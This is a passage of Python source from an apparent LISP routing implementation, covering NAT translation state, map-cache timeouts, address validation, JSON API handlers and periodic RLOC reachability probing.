    if (store == False):
        return([info.global_etr_rloc, info.etr_port, new_rtr_set])

    #
    # Store the translated RLOC and port in each matching database-mapping
    # RLOC entry.
    #
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            rloc = rloc_entry.rloc
            interface = rloc_entry.interface
            if (interface == None):
                if (rloc.is_null()): continue
                if (rloc.is_local() == False): continue
                if (info.private_etr_rloc.is_null() == False and
                    rloc.is_exact_match(info.private_etr_rloc) == False):
                    continue
            elif (info.private_etr_rloc.is_dist_name()):
                rloc_name = info.private_etr_rloc.address
                if (rloc_name != rloc_entry.rloc_name): continue

            eid_str = green(db.eid.print_prefix(), False)
            rloc_str = red(rloc.print_address_no_iid(), False)

            same_rloc = info.global_etr_rloc.is_exact_match(rloc)
            if (rloc_entry.translated_port == 0 and same_rloc):
                lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
                    interface, eid_str))
                continue

            #
            # Skip when translation state is unchanged.
            #
            global_rloc = info.global_etr_rloc
            translated = rloc_entry.translated_rloc
            if (translated.is_exact_match(global_rloc) and
                info.etr_port == rloc_entry.translated_port): continue

            lprint("Store translation {}:{} for {} ({}), EID-prefix {}".format(
                red(info.global_etr_rloc.print_address_no_iid(), False),
                info.etr_port, rloc_str, interface, eid_str))

            rloc_entry.store_translated_rloc(info.global_etr_rloc,
                info.etr_port)

    return([info.global_etr_rloc, info.etr_port, new_rtr_set])
def lisp_test_mr(lisp_sockets, port):

    #
    # This test is disabled; the early return below keeps it from running.
    #
    return
    lprint("Test Map-Resolvers")

    eid4 = lisp_address(LISP_AFI_IPV4, "", 0, 0)
    eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)

    #
    # Send Map-Requests for IPv4 EIDs.
    #
    eid4.store_address("10.0.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid4, None)
    eid4.store_address("192.168.0.1")
    lisp_send_map_request(lisp_sockets, port, None, eid4, None)

    #
    # Send Map-Requests for IPv6 EIDs.
    #
    eid6.store_address("0100::1")
    lisp_send_map_request(lisp_sockets, port, None, eid6, None)
    eid6.store_address("8000::1")
    lisp_send_map_request(lisp_sockets, port, None, eid6, None)

    #
    # Restart periodic test timer.
    #
    test_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
        [lisp_sockets, port])
    test_timer.start()
    return
def lisp_update_local_rloc(rloc):
    if (rloc.interface == None): return

    address = lisp_get_interface_address(rloc.interface)
    if (address == None): return

    old_addr = rloc.rloc.print_address_no_iid()
    new_addr = address.print_address_no_iid()

    if (old_addr == new_addr): return

    lprint("Local interface address changed on {} from {} to {}".format(
        rloc.interface, old_addr, new_addr))

    rloc.rloc.copy_address(address)
    lisp_myrlocs[0] = address
    return
def lisp_update_encap_port(mc):
    for rloc in mc.rloc_set:
        nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
        if (nat_info == None): continue
        if (rloc.translated_port == nat_info.port): continue

        lprint(("Encap-port changed from {} to {} for RLOC {}, " +
            "EID-prefix {}").format(rloc.translated_port, nat_info.port,
            red(rloc.rloc.print_address_no_iid(), False),
            green(mc.print_eid_tuple(), False)))

        rloc.store_translated_rloc(rloc.rloc, nat_info.port)
    return
def lisp_timeout_map_cache_entry(mc, delete_list):

    #
    # Entries with no TTL never time out; just refresh their encap-ports.
    #
    if (mc.map_cache_ttl == None):
        lisp_update_encap_port(mc)
        return([True, delete_list])

    now = lisp_get_timestamp()

    #
    # Keep entries that have not timed out yet.
    #
    if (mc.last_refresh_time + mc.map_cache_ttl > now):
        if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
        return([True, delete_list])

    #
    # Never time out NAT-traversal default map-cache entries.
    #
    if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
        return([True, delete_list])

    #
    # The entry has timed out; queue it for deferred deletion.
    #
    elapsed = lisp_print_elapsed(mc.last_refresh_time)
    eid_str = mc.print_eid_tuple()
    lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}".format(
        green(eid_str, False), bold("timed out", False), elapsed))

    delete_list.append(mc)
    return([True, delete_list])
def lisp_timeout_map_cache_walk(mc, parms):
    delete_list = parms[0]
    checkpoint_list = parms[1]

    #
    # Unicast entries: time out, and checkpoint the entries we keep. Both
    # lists are mutated in place, so returning parms preserves them.
    #
    if (mc.group.is_null()):
        status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
        if (delete_list == [] or mc != delete_list[-1]):
            checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list,
                mc)
        return([status, parms])

    if (mc.source_cache == None): return([True, parms])

    #
    # For (S,G) entries, walk the source-cache stored in the group entry.
    #
    parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
    return([True, parms])
def lisp_timeout_map_cache(lisp_map_cache):
    parms = [[], []]
    parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)

    #
    # Delete timed-out entries outside of the cache walk.
    #
    delete_list = parms[0]
    for mc in delete_list: mc.delete_cache()

    #
    # Write surviving entries to the checkpoint file.
    #
    checkpoint_list = parms[1]
    lisp_checkpoint(checkpoint_list)
    return
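
#
# Illustrative sketch: a periodic housekeeping job would run the timeout
# walk against the global map-cache; the 60-second interval here is a
# hypothetical choice.
#
#   def timeout_job():
#       lisp_timeout_map_cache(lisp_map_cache)
#       threading.Timer(60, timeout_job).start()
#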
def lisp_store_nat_info(hostname, rloc, port):
    addr_str = rloc.print_address_no_iid()
    msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
        blue(hostname, False), red(addr_str, False), port)

    new_nat_info = lisp_nat_info(addr_str, hostname, port)

    if (lisp_nat_state_info.has_key(hostname) == False):
        lisp_nat_state_info[hostname] = [new_nat_info]
        lprint(msg.format("Store initial"))
        return(True)

    #
    # If the head entry matches, just refresh its uptime.
    #
    nat_info = lisp_nat_state_info[hostname][0]
    if (nat_info.address == addr_str and nat_info.port == port):
        nat_info.uptime = lisp_get_timestamp()
        lprint(msg.format("Refresh existing"))
        return(False)

    #
    # Look for the entry elsewhere in the list; either way the new state
    # becomes the head of the list.
    #
    found = None
    for nat_info in lisp_nat_state_info[hostname]:
        if (nat_info.address == addr_str and nat_info.port == port):
            found = nat_info
            break

    if (found == None):
        lprint(msg.format("Store new"))
    else:
        lisp_nat_state_info[hostname].remove(found)
        lprint(msg.format("Use previous"))

    existing = lisp_nat_state_info[hostname]
    lisp_nat_state_info[hostname] = [new_nat_info] + existing
    return(True)
def lisp_get_nat_info(rloc, hostname):
    if (lisp_nat_state_info.has_key(hostname) == False): return(None)

    addr_str = rloc.print_address_no_iid()
    for nat_info in lisp_nat_state_info[hostname]:
        if (nat_info.address == addr_str): return(nat_info)
    return(None)
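
#
# Illustrative sketch: NAT state is keyed by hostname with the newest
# entry first. rloc is a hypothetical lisp_address holding the xTR's
# global address; 16385 is a made-up translated port.
#
#   changed = lisp_store_nat_info("xtr-1", rloc, 16385)  # True if new state
#   nat_info = lisp_get_nat_info(rloc, "xtr-1")          # None if unknown
#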
def lisp_build_info_requests(lisp_sockets, dest, port):
    if (lisp_nat_traversal == False): return

    #
    # With no explicit destination, send Info-Requests to all configured
    # map-resolvers, falling back to the map-servers.
    #
    dest_list = []
    mr_list = []
    if (dest == None):
        for mr in lisp_map_resolvers_list.values():
            mr_list.append(mr.map_resolver)

        dest_list = mr_list
        if (dest_list == []):
            for ms in lisp_map_servers_list.values():
                dest_list.append(ms.map_server)

        if (dest_list == []): return
    else:
        dest_list.append(dest)

    #
    # Find all local private RLOCs configured with "interface = <device>"
    # in database-mappings.
    #
    rloc_list = {}
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            lisp_update_local_rloc(rloc_entry)
            if (rloc_entry.rloc.is_null()): continue
            if (rloc_entry.interface == None): continue

            address = rloc_entry.rloc.print_address_no_iid()
            if (address in rloc_list): continue
            rloc_list[address] = rloc_entry.interface

    if (rloc_list == {}):
        lprint('Suppress Info-Request, no "interface = <device>" RLOC ' +
            "found in any database-mappings")
        return

    #
    # Send an Info-Request out each interface with a private address.
    #
    for address in rloc_list:
        interface = rloc_list[address]
        addr_str = red(address, False)
        lprint("Build Info-Request for private address {} ({})".format(
            addr_str, interface))
        device = interface if len(rloc_list) > 1 else None
        for dest in dest_list:
            lisp_send_info_request(lisp_sockets, dest, port, device)

    #
    # Re-resolve map-resolver DNS names periodically.
    #
    if (mr_list != []):
        for mr in lisp_map_resolvers_list.values():
            mr.resolve_dns_name()
    return

#
# lisp_valid_address_format
#
# Return True if "value" is a well-formed address literal for the "address"
# keyword: IPv4 dotted-quad, geo-coordinates, MAC (xxxx-xxxx-xxxx), IPv6,
# E.164 (+digits), or a quoted distinguished-name. Other keywords are not
# validated here.
#
def lisp_valid_address_format(kw, value):
    if (kw != "address"): return(True)

    #
    # A quoted string is a distinguished-name.
    #
    if (value[0] == "'" and value[-1] == "'"): return(True)

    #
    # Check IPv4 dotted-quad: exactly 4 decimal bytes, each <= 255.
    #
    if (value.find(".") != -1):
        addr = value.split(".")
        if (len(addr) != 4): return(False)

        for byte in addr:
            if (byte.isdigit() == False): return(False)
            if (int(byte) > 255): return(False)
        return(True)

    #
    # Check geo-coordinates: dash-separated with an N/S/W/E direction
    # letter and at least 8 components.
    #
    if (value.find("-") != -1):
        addr = value.split("-")
        for direction in ["N", "S", "W", "E"]:
            if (direction in addr):
                if (len(addr) < 8): return(False)
                return(True)

    #
    # Check MAC format: three dash-separated 16-bit hex groups.
    #
    if (value.find("-") != -1):
        addr = value.split("-")
        if (len(addr) != 3): return(False)

        for hexgroup in addr:
            try: int(hexgroup, 16)
            except: return(False)
        return(True)

    #
    # Check IPv6: colon-separated hex groups with at most one "::".
    #
    if (value.find(":") != -1):
        addr = value.split(":")
        if (len(addr) < 2): return(False)

        found_null = False
        count = 0
        for hexgroup in addr:
            count += 1
            if (hexgroup == ""):
                if (found_null):
                    if (len(addr) == count): break
                    if (count > 2): return(False)
                found_null = True
                continue
            try: int(hexgroup, 16)
            except: return(False)
        return(True)

    #
    # Check E.164: a "+" followed by all digits.
    #
    if (value[0] == "+"):
        addr = value[1::]
        for digit in addr:
            if (digit.isdigit() == False): return(False)
        return(True)
    return(False)
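
#
# Usage sketch for lisp_valid_address_format() (illustrative only, not
# called here; values are hypothetical and traced from the checks above):
#
#   lisp_valid_address_format("address", "10.0.0.1")              -> True
#   lisp_valid_address_format("address", "fe80::1")               -> True
#   lisp_valid_address_format("address", "0000-1111-2222")        -> True
#   lisp_valid_address_format("address", "40-44-58-N-73-59-11-W") -> True
#   lisp_valid_address_format("address", "+14155551212")          -> True
#   lisp_valid_address_format("address", "'web-server'")          -> True
#   lisp_valid_address_format("address", "bogus")                 -> False
#   lisp_valid_address_format("eid-prefix", "anything")           -> True,
#                               since only the "address" keyword is checked
#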

#
# lisp_process_api
#
# Process an API request that arrived over IPC. "data_structure" is
# "<api-name>%<json-parameters>"; an empty parameter string means return
# everything for that API. The JSON result is IPC'ed back to lisp-core.
#
def lisp_process_api(process, lisp_socket, data_structure):
    api_name, parms = data_structure.split("%")

    lprint("Process API request '{}', parameters: '{}'".format(api_name,
        parms))

    data = []
    if (api_name == "map-cache"):
        if (parms == ""):
            data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
        else:
            data = lisp_process_api_map_cache_entry(json.loads(parms))

    if (api_name == "site-cache"):
        if (parms == ""):
            data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
                data)
        else:
            data = lisp_process_api_site_cache_entry(json.loads(parms))

    if (api_name == "map-server"):
        parms = {} if (parms == "") else json.loads(parms)
        data = lisp_process_api_ms_or_mr(True, parms)

    if (api_name == "map-resolver"):
        parms = {} if (parms == "") else json.loads(parms)
        data = lisp_process_api_ms_or_mr(False, parms)

    if (api_name == "database-mapping"):
        data = lisp_process_api_database_mapping()

    #
    # Encode result and send it back to the lisp-core process.
    #
    data = json.dumps(data)
    ipc = lisp_api_ipc(process, data)
    lisp_ipc(ipc, lisp_socket, "lisp-core")
    return
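
#
# Request-string sketch for lisp_process_api() (illustrative; the prefixes
# are hypothetical). The text before "%" selects the API, the text after is
# an optional JSON parameter blob:
#
#   "map-cache%"              walk and return the entire map-cache
#   'map-cache%{"instance-id": "0", "eid-prefix": "10.0.0.0/8"}'
#                             return one map-cache entry
#   "map-resolver%"           return the first configured map-resolver
#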

#
# lisp_process_api_map_cache
#
# Gather data for one map-cache entry. For (S,G) entries, walk the
# per-group source-cache as well.
#
def lisp_process_api_map_cache(mc, data):

    #
    # Destination-only state in this entry.
    #
    if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))

    if (mc.source_cache == None): return([True, data])

    #
    # (source, group) state; walk all sources for this group entry.
    #
    data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
    return([True, data])

#
# lisp_gather_map_cache_data
#
# Build a JSON-ready dictionary for one map-cache entry, including its
# RLOC-set.
#
def lisp_gather_map_cache_data(mc, data):
    entry = {}
    entry["instance-id"] = str(mc.eid.instance_id)
    entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
    if (mc.group.is_null() == False):
        entry["group-prefix"] = mc.group.print_prefix_no_iid()

    entry["uptime"] = lisp_print_elapsed(mc.uptime)
    entry["expires"] = lisp_print_elapsed(mc.uptime)
    entry["action"] = lisp_map_reply_action_string[mc.action]
    entry["ttl"] = "--" if mc.map_cache_ttl == None else \
        str(mc.map_cache_ttl / 60)

    #
    # Encode the RLOC-set.
    #
    rloc_set = []
    for rloc in mc.rloc_set:
        r = lisp_fill_rloc_in_json(rloc)

        #
        # For a multicast RLOC, include each member of the replication
        # list.
        #
        if (rloc.rloc.is_multicast_address()):
            r["multicast-rloc-set"] = []
            for member in rloc.multicast_rloc_probe_list.values():
                m = lisp_fill_rloc_in_json(member)
                r["multicast-rloc-set"].append(m)

        rloc_set.append(r)

    entry["rloc-set"] = rloc_set

    data.append(entry)
    return([True, data])

#
# lisp_fill_rloc_in_json
#
# Build a JSON-ready dictionary for one RLOC entry of a map-cache entry.
#
def lisp_fill_rloc_in_json(rloc):
    r = {}
    if (rloc.rloc_exists()):
        r["address"] = rloc.rloc.print_address_no_iid()

    if (rloc.translated_port != 0):
        r["encap-port"] = str(rloc.translated_port)

    r["state"] = rloc.print_state()
    if (rloc.geo): r["geo"] = rloc.geo.print_geo()
    if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
    if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
    if (rloc.json): r["json"] = rloc.json.print_json(False)
    if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
    stats = rloc.stats.get_stats(False, False)
    if (stats): r["stats"] = stats
    r["uptime"] = lisp_print_elapsed(rloc.uptime)
    r["upriority"] = str(rloc.priority)
    r["uweight"] = str(rloc.weight)
    r["mpriority"] = str(rloc.mpriority)
    r["mweight"] = str(rloc.mweight)
    last_reply = rloc.last_rloc_probe_reply
    if (last_reply):
        r["last-rloc-probe-reply"] = lisp_print_elapsed(last_reply)
        r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)

    r["rloc-hop-count"] = rloc.rloc_probe_hops
    r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops

    r["rloc-probe-latency"] = rloc.rloc_probe_latency
    r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies

    rtts = []
    for rtt in rloc.recent_rloc_probe_rtts: rtts.append(str(rtt))
    r["recent-rloc-probe-rtts"] = rtts
    return(r)
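
#
# Shape of the dictionary returned by lisp_fill_rloc_in_json(), with
# illustrative values (optional keys like "geo", "elp", "rle", "json",
# "rloc-name", "stats", "last-rloc-probe-reply", and "rloc-probe-rtt"
# appear only when that state exists):
#
#   { "address" : "203.0.113.1", "encap-port" : "4341", "state" : "up",
#     "uptime" : "...", "upriority" : "1", "uweight" : "100",
#     "mpriority" : "255", "mweight" : "0", "rloc-hop-count" : ...,
#     "recent-rloc-hop-counts" : [...], "rloc-probe-latency" : ...,
#     "recent-rloc-probe-latencies" : [...],
#     "recent-rloc-probe-rtts" : ["0.1", ...] }
#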

#
# lisp_process_api_map_cache_entry
#
# Look up one map-cache entry described by the "parms" dictionary and
# return its data in an array.
#
def lisp_process_api_map_cache_entry(parms):
    iid = parms["instance-id"]
    iid = 0 if (iid == "") else int(iid)

    #
    # Get the EID, which doubles as the source of an (S,G) lookup.
    #
    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])
    dest = eid
    source = eid

    #
    # If a group-prefix was supplied, this is a group lookup.
    #
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if ("group-prefix" in parms):
        group.store_prefix(parms["group-prefix"])
        dest = group

    data = []
    mc = lisp_map_cache_lookup(source, dest)
    if (mc): status, data = lisp_process_api_map_cache(mc, data)
    return(data)
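
#
# Example "parms" for a unicast and an (S,G) lookup (hypothetical values;
# the keys are the ones consumed above):
#
#   lisp_process_api_map_cache_entry({"instance-id" : "0",
#       "eid-prefix" : "10.1.0.0/16"})
#
#   lisp_process_api_map_cache_entry({"instance-id" : "0",
#       "eid-prefix" : "10.1.1.1/32", "group-prefix" : "224.1.1.1/32"})
#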

#
# lisp_process_api_site_cache
#
# Gather data for one site-cache entry. For (S,G) entries, walk the
# per-group source-cache as well.
#
def lisp_process_api_site_cache(se, data):

    #
    # Destination-only state in this entry.
    #
    if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))

    if (se.source_cache == None): return([True, data])

    #
    # (source, group) state; walk all sources for this group entry.
    #
    data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
    return([True, data])

#
# lisp_process_api_ms_or_mr
#
# Return info for the first configured map-server (ms_or_mr is True) or
# map-resolver (ms_or_mr is False) matching the supplied "dns-name" or
# "address".
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
    address = lisp_address(LISP_AFI_NONE, "", 0, 0)
    dns_name = data["dns-name"] if ("dns-name" in data) else None
    if ("address" in data):
        address.store_address(data["address"])

    value = {}
    if (ms_or_mr):
        for ms in lisp_map_servers_list.values():
            if (dns_name):
                if (dns_name != ms.dns_name): continue
            else:
                if (address.is_exact_match(ms.map_server) == False): continue

            value["dns-name"] = ms.dns_name
            value["address"] = ms.map_server.print_address_no_iid()
            value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
            return([value])
    else:
        for mr in lisp_map_resolvers_list.values():
            if (dns_name):
                if (dns_name != mr.dns_name): continue
            else:
                if (address.is_exact_match(mr.map_resolver) == False): continue

            value["dns-name"] = mr.dns_name
            value["address"] = mr.map_resolver.print_address_no_iid()
            value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
            return([value])

    return([])
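
#
# Query sketches (hypothetical names and addresses): either key may select
# the entry; "dns-name" takes precedence when both are present:
#
#   lisp_process_api_ms_or_mr(True, {"dns-name" : "ms.example.com"})
#   lisp_process_api_ms_or_mr(False, {"address" : "192.0.2.1"})
#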

#
# lisp_process_api_database_mapping
#
# Return an array of configured database-mappings, each with its EID,
# optional group, and RLOC-set.
#
def lisp_process_api_database_mapping():
    data = []

    for db in lisp_db_list:
        entry = {}
        entry["eid-prefix"] = db.eid.print_prefix()
        if (db.group.is_null() == False):
            entry["group-prefix"] = db.group.print_prefix()

        rlocs = []
        for r in db.rloc_set:
            rloc = {}
            if (r.rloc.is_null() == False):
                rloc["rloc"] = r.rloc.print_address_no_iid()
            if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
            if (r.interface != None): rloc["interface"] = r.interface
            tr = r.translated_rloc
            if (tr.is_null() == False):
                rloc["translated-rloc"] = tr.print_address_no_iid()

            if (rloc != {}): rlocs.append(rloc)

        #
        # Attach the RLOC array and append the EID entry.
        #
        entry["rlocs"] = rlocs
        data.append(entry)

    return(data)

#
# lisp_gather_site_cache_data
#
# Build a JSON-ready dictionary for one site-cache (registration) entry,
# including the registered RLOC-set.
#
def lisp_gather_site_cache_data(se, data):
    entry = {}
    entry["site-name"] = se.site.site_name
    entry["instance-id"] = str(se.eid.instance_id)
    entry["eid-prefix"] = se.eid.print_prefix_no_iid()
    if (se.group.is_null() == False):
        entry["group-prefix"] = se.group.print_prefix_no_iid()

    entry["registered"] = "yes" if se.registered else "no"
    entry["first-registered"] = lisp_print_elapsed(se.first_registered)
    entry["last-registered"] = lisp_print_elapsed(se.last_registered)

    addr = se.last_registerer
    addr = "none" if addr.is_null() else addr.print_address()
    entry["last-registerer"] = addr
    entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
    entry["dynamic"] = "yes" if (se.dynamic) else "no"
    entry["site-id"] = str(se.site_id)
    if (se.xtr_id_present):
        entry["xtr-id"] = "0x" + lisp_hex_string(se.xtr_id)

    #
    # Encode the registered RLOC-set.
    #
    rloc_set = []
    for rloc in se.registered_rlocs:
        r = {}
        r["address"] = rloc.rloc.print_address_no_iid() if \
            rloc.rloc_exists() else "none"

        if (rloc.geo): r["geo"] = rloc.geo.print_geo()
        if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
        if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
        if (rloc.json): r["json"] = rloc.json.print_json(False)
        if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
        r["uptime"] = lisp_print_elapsed(rloc.uptime)
        r["upriority"] = str(rloc.priority)
        r["uweight"] = str(rloc.weight)
        r["mpriority"] = str(rloc.mpriority)
        r["mweight"] = str(rloc.mweight)

        rloc_set.append(r)

    entry["registered-rlocs"] = rloc_set

    data.append(entry)
    return([True, data])

#
# lisp_process_api_site_cache_entry
#
# Look up one site-cache entry described by the "parms" dictionary and
# return its data in an array.
#
def lisp_process_api_site_cache_entry(parms):
    iid = parms["instance-id"]
    iid = 0 if (iid == "") else int(iid)

    eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
    eid.store_prefix(parms["eid-prefix"])

    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    if ("group-prefix" in parms):
        group.store_prefix(parms["group-prefix"])

    data = []
    se = lisp_site_eid_lookup(eid, group, False)
    if (se): lisp_gather_site_cache_data(se, data)
    return(data)

#
# lisp_get_interface_instance_id
#
# Return the instance-id to use for a packet that arrived on "device".
# When multi-tenancy is configured on the device, longest-match
# "source_eid" against the configured multi-tenant EID-prefixes.
#
def lisp_get_interface_instance_id(device, source_eid):
    interface = None
    if (device in lisp_myinterfaces):
        interface = lisp_myinterfaces[device]

    #
    # Use the default instance-id when the interface is not found or has
    # no instance-id configured.
    #
    if (interface == None or interface.instance_id == None):
        return(lisp_default_iid)

    #
    # Start with the interface's own instance-id. Without a source EID,
    # that is the answer.
    #
    iid = interface.get_instance_id()
    if (source_eid == None): return(iid)

    #
    # Longest-match the source EID against the multi-tenant EID-prefixes
    # configured on this device.
    #
    save_iid = source_eid.instance_id
    best = None
    for interface in lisp_multi_tenant_interfaces:
        if (interface.device != device): continue
        prefix = interface.multi_tenant_eid
        source_eid.instance_id = prefix.instance_id
        if (source_eid.is_more_specific(prefix) == False): continue
        if (best == None or
            best.multi_tenant_eid.mask_len < prefix.mask_len):
            best = interface

    source_eid.instance_id = save_iid

    if (best == None): return(iid)
    return(best.get_instance_id())
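
#
# Selection sketch (hypothetical config): with two multi-tenant prefixes
# on device "eth0", say [1000]10.0.0.0/8 and [2000]10.1.0.0/16, a source
# EID of 10.1.2.3 matches both; the /16 wins the longest-match, so
# instance-id 2000 is returned.
#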

#
# lisp_allow_dynamic_eid
#
# Return the interface name (or its configured dynamic-eid-device) when
# "eid" matches a dynamic-EID prefix configured on "device"; otherwise
# return None.
#
def lisp_allow_dynamic_eid(device, eid):
    if ((device in lisp_myinterfaces) == False): return(None)

    interface = lisp_myinterfaces[device]
    return_interface = device if interface.dynamic_eid_device == None else \
        interface.dynamic_eid_device

    if (interface.does_dynamic_eid_match(eid)): return(return_interface)
    return(None)

#
# lisp_start_rloc_probe_timer
#
# (Re)arm the periodic RLOC-probe timer, canceling any timer already
# running.
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
    global lisp_rloc_probe_timer

    if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()

    func = lisp_process_rloc_probe_timer
    timer = threading.Timer(interval, func, [lisp_sockets])
    lisp_rloc_probe_timer = timer
    timer.start()
    return
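
#
# A minimal standalone sketch of the same cancel-and-rearm pattern used
# above (hypothetical names, independent of this module's state):
#
#   periodic_timer = None
#
#   def start_periodic(interval, arg):
#       global periodic_timer
#       if (periodic_timer != None): periodic_timer.cancel()
#       periodic_timer = threading.Timer(interval, fire, [arg])
#       periodic_timer.start()
#
#   def fire(arg):
#       start_periodic(30, arg)   # rearm first so the work can't skip it
#       # ... do the periodic work ...
#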

#
# lisp_show_rloc_probe_list
#
# Debug dump of the RLOC probe-list.
#
def lisp_show_rloc_probe_list():
    lprint(bold("----- RLOC-probe-list -----", False))
    for key in lisp_rloc_probe_list:
        rloc_list = lisp_rloc_probe_list[key]
        lprint("RLOC {}:".format(key))
        for rloc, eid, group in rloc_list:
            lprint(" [{}, {}, {}, {}]".format(hex(id(rloc)),
                eid.print_prefix(), group.print_prefix(),
                rloc.translated_port))
    lprint(bold("---------------------------", False))
    return

#
# lisp_mark_rlocs_for_other_eids
#
# An RLOC was just declared unreachable by the caller for the first EID in
# "eid_list"; mark the same RLOC unreachable for every other EID that uses
# it and push the updated map-cache entries to the data-plane.
#
def lisp_mark_rlocs_for_other_eids(eid_list):

    #
    # The first tuple's RLOC was already marked by the caller; just record
    # its EID for printing.
    #
    rloc, eid, group = eid_list[0]
    eids = [lisp_print_eid_tuple(eid, group)]

    for rloc, eid, group in eid_list[1::]:
        rloc.state = LISP_RLOC_UNREACH_STATE
        rloc.last_state_change = lisp_get_timestamp()
        eids.append(lisp_print_eid_tuple(eid, group))

    unreach = bold("unreachable", False)
    rloc_str = red(rloc.rloc.print_address_no_iid(), False)

    for eid_str in eids:
        e = green(eid_str, False)
        lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))

    #
    # Update map-cache entries with the stored RLOC state and tell the
    # external data-plane.
    #
    for rloc, eid, group in eid_list:
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc): lisp_write_ipc_map_cache(True, mc)
    return

#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer. Walk the RLOC probe-list and send a
# Map-Request RLOC-probe to each reachable, non-suppressed RLOC, pacing
# the probes.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
    lisp_set_exception()

    lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
    if (lisp_rloc_probing == False): return

    #
    # Debug dump of the probe-list, normally disabled.
    #
    if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()

    #
    # Get default-route next-hops so multihomed exits can be validated.
    #
    default_next_hops = lisp_get_default_route_next_hops()

    lprint("---------- Start RLOC Probing for {} entries ----------".format(
        len(lisp_rloc_probe_list)))

    #
    # Walk the probe-list; each entry is a list of (rloc, eid, group)
    # tuples that share the same RLOC address.
    #
    count = 0
    probe_str = bold("RLOC-probe", False)
    for values in lisp_rloc_probe_list.values():
        last_rloc = None
        for parent_rloc, eid, group in values:
            addr_str = parent_rloc.rloc.print_address_no_iid()

            #
            # Suppress probes for gleaned entries unless gleaned
            # RLOC-probing is configured.
            #
            glean, rloc_probe, x = lisp_allow_gleaning(eid, None,
                parent_rloc)
            if (glean and rloc_probe == False):
                e = green(eid.print_address(), False)
                addr_str += ":{}".format(parent_rloc.translated_port)
                lprint("Suppress probe to RLOC {} for gleaned EID {}".format(
                    red(addr_str, False), e))
                continue

            #
            # Do not probe RLOCs in admin-down state.
            #
            if (parent_rloc.down_state()): continue

            #
            # The same RLOC address was just probed for another EID; copy
            # probe state and suppress the duplicate probe.
            #
            if (last_rloc):
                parent_rloc.last_rloc_probe_nonce = \
                    last_rloc.last_rloc_probe_nonce

                if (last_rloc.translated_port ==
                    parent_rloc.translated_port and
                    last_rloc.rloc_name == parent_rloc.rloc_name):
                    e = green(lisp_print_eid_tuple(eid, group), False)
                    lprint("Suppress probe to duplicate RLOC {} for {}".\
                        format(red(addr_str, False), e))
                    parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
                    continue

            saved_nh = None
            rloc = None
            while (True):
                rloc = parent_rloc if rloc == None else rloc.next_rloc
                if (rloc == None): break

                #
                # If the RLOC's next-hop is no longer one of the default
                # route's next-hops, declare it unreachable. (The unpack
                # is hoisted above the state test so the lprint below
                # always has values.)
                #
                if (rloc.rloc_next_hop != None):
                    if (rloc.rloc_next_hop not in default_next_hops):
                        device, nh = rloc.rloc_next_hop
                        if (rloc.up_state()):
                            rloc.state = LISP_RLOC_UNREACH_STATE
                            rloc.last_state_change = lisp_get_timestamp()
                            lisp_update_rtr_updown(rloc.rloc, False)

                        unreach = bold("unreachable", False)
                        lprint("Next-hop {}({}) for RLOC {} is {}".format(
                            nh, device, red(addr_str, False), unreach))
                        continue

                #
                # Still waiting for a probe-reply to the last probe.
                #
                last = rloc.last_rloc_probe
                delta = 0 if last == None else time.time() - last
                if (rloc.unreach_state() and
                    delta < LISP_RLOC_PROBE_INTERVAL):
                    lprint("Waiting for probe-reply from RLOC {}".format(
                        red(addr_str, False)))
                    continue

                #
                # A requested nonce-echo was never returned; mark the RLOC
                # and fall back to probing it.
                #
                echo_nonce = lisp_get_echo_nonce(None, addr_str)
                if (echo_nonce and echo_nonce.request_nonce_timeout()):
                    rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
                    rloc.last_state_change = lisp_get_timestamp()
                    unreach = bold("unreachable", False)
                    lprint("RLOC {} went {}, nonce-echo failed".format(
                        red(addr_str, False), unreach))
                    lisp_update_rtr_updown(rloc.rloc, False)
                    continue

                #
                # A nonce-echo came back recently, so no probe is needed.
                #
